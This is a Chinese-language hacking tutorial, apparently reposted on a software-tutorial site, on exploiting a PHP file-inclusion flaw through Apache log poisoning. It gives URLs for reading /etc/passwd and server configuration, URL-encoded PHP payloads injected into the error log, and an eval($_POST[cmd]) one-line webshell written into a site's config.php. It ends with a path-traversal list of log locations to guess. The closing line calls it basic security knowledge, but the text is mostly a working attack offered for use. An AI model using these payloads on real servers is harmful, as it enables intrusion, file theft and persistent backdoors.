明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

linux下備份拿shell

發(fā)表時間:2023-05-31 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]關(guān)于php包含Apache日志的利用,其實也就是利用提交的網(wǎng)址里有php語句, 然后再被Apache服務(wù)器的日志記錄, 然后php再去包含執(zhí)行, 從而包含了去執(zhí)行。 當(dāng)然, 這種辦法最大的弊端是A...

關(guān)于php包含Apache日志的利用,其實也就是利用提交的網(wǎng)址里有php語句, 然后再被Apache服務(wù)器的日志記錄, 然后php再去包含執(zhí)行, 從而包含了去執(zhí)行。 當(dāng)然, 這種辦法最大的弊端是Apache日志肯定會過大, 回應(yīng)的時候當(dāng)然會超時什么的, 所以也是受條件限制的。 全當(dāng)一種研究算了。 下面是我的測試過程, 我覺得很有意思, 你也看看。

比如說, 在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句

<? include($zizzy); ?> //包含變量$zizzy

你可以

http://xxx.com/z.php?zizzy=/etc/inetd.conf

http://xxx.com/z.php?zizzy=/proc/cpuinfo

http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語句來查看一些系統(tǒng)環(huán)境和密碼檔文件。

那么關(guān)于日志包含下面我們來看:

比如我們的Apache的服務(wù)器配置文件位置在這里

/usr/local/apache/conf/httpd.conf

那么我們來包含一下httpd.conf, 來看下路徑信息什么的

http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息, 這里列出部分信息。

<VirtualHost 218.63.89.2>

User #3

Group silver

ServerAdmin webmaster@xxx.com

DocumentRoot /home/virtual/www.xxx.com

ServerName www.xxx.com

ServerAlias xxx.com

ErrorLog /home/virtual/www.xxx.com/logs/www-error_log

CustomLog /home/virtual/www.xxx.com/logs/www-access_log common

ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/

Alias /icons/ /home/virtual/www.xxx.com/icons

</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

就可以讀出Apache的錯誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not

exist: /home/virtual/www.xxx.com/hack.php

[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not

exist: /home/virtual/www.xxx.com/111111111.php

[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not

exist: /home/virtual/www.xxx.com/22222.php3

[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke

directory as script: /home/virtual/www.xxx.com/forum

[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke

directory as script: /home/virtual/www.xxx.com/blog

[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke

directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的, 一樣可以讀出來, 只不過文件會很大, 那也沒意思測試下去了, 那怎么利用呢。

比如我們提交要提交這句, <?phpinfo();?> //查看php的相關(guān)信息

在這里, 我們只能提交URL編碼模式, 因為我在測試中發(fā)現(xiàn), <?的標(biāo)記并不被記錄, 只有轉(zhuǎn)換成URL編碼提交才會被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過了的<?phpinfo();?>, 我們提交

http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會報出錯找不到頁面, 而一出錯就被記在錯誤日志里了

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣這個日志文件就被包含成了phpinfo的信息, 而回顯也就成了一個顯示php信息的頁面。

如果可以的話(能夠執(zhí)行系統(tǒng)命令, 也就是safe_mode開著的時候),

這樣子也不錯,

<?system("ls+-la+/home");?> //執(zhí)行命令列出home下的文件列表, 記得轉(zhuǎn)換為URL格式哦。

/home/

total 9

-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php

drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc

-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php

-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php

-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php

-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3

-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt

drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup

-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php

這樣就列出了home下的文件

或者直接一句話木馬<?eval($_POST[cmd]);?>,

這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。

我們提交

http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

再用lanker的一句話木馬客戶端一連就OK了。

因為上面那個很不實際, 我在測試中發(fā)現(xiàn)日志動不動就是幾十兆, 那樣玩起來也沒意思了。 下面想的再深入一點也就是我們寫入一個很實際的webshell來用, 也比上面那種慢的要死好很多。

比如還是這句一句話木馬

<?eval($_POST[cmd]);?>

到這里你也許就想到了, 這是個很不錯的辦法。 接著看,如何寫入就成了個問題, 用這句,

fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件, 然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務(wù)端語句。 連起來表達(dá)成php語句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");

fclose($fp);?> //在config.php里寫入一句木馬語句

我們提交這句, 再讓Apache記錄到錯誤日志里, 再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功。

轉(zhuǎn)換為

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F

config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp

%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B

fclose%28%24fp%29%3B%3F%3E

我們提交

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww

%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp

%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B

cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。

我們再來包含日志, 提交

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了, config.php里就寫入一句木馬語句

OK.

http://www.xxx.com/forum/config.php這個就成了我們的webshell

直接用lanker的客戶端一連, 主機就是你的了。

PS:上面講的, 前提是文件夾權(quán)限必須可寫 , 一定要-rwxrwxrwx(777)才能繼續(xù), 這里直接用上面列出的目錄來查看。 上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑, 你可以去猜, 也可以參照這里。

附:收集的一些日志路徑

../../../../../../../../../../var/log/httpd/access_log

../../../../../../../../../../var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

../../../../../../../../../../etc/httpd/logs/acces_log

../../../../../../../../../../etc/httpd/logs/acces.log

../../../../../../../../../../etc/httpd/logs/error_log

../../../../../../../../../../etc/httpd/logs/error.log

../../../../../../../../../../var/www/logs/access_log

../../../../../../../../../../var/www/logs/access.log

../../../../../../../../../../usr/local/apache/logs/access_log

../../../../../../../../../../usr/local/apache/logs/access.log

../../../../../../../../../../var/log/apache/access_log

../../../../../../../../../../var/log/apache/access.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/www/logs/error_log

../../../../../../../../../../var/www/logs/error.log

../../../../../../../../../../usr/local/apache/logs/error_log

../../../../../../../../../../usr/local/apache/logs/error.log

../../../../../../../../../../var/log/apache/error_log

../../../../../../../../../../var/log/apache/error.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/log/error_log

/var/log/httpd/access_log

/var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

/etc/httpd/logs/acces_log

/etc/httpd/logs/acces.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/access_log

/var/www/logs/error_log

/var/www/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/var/log/apache/error_log

/var/log/apache/error.log


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




標(biāo)簽:linux下備份拿shell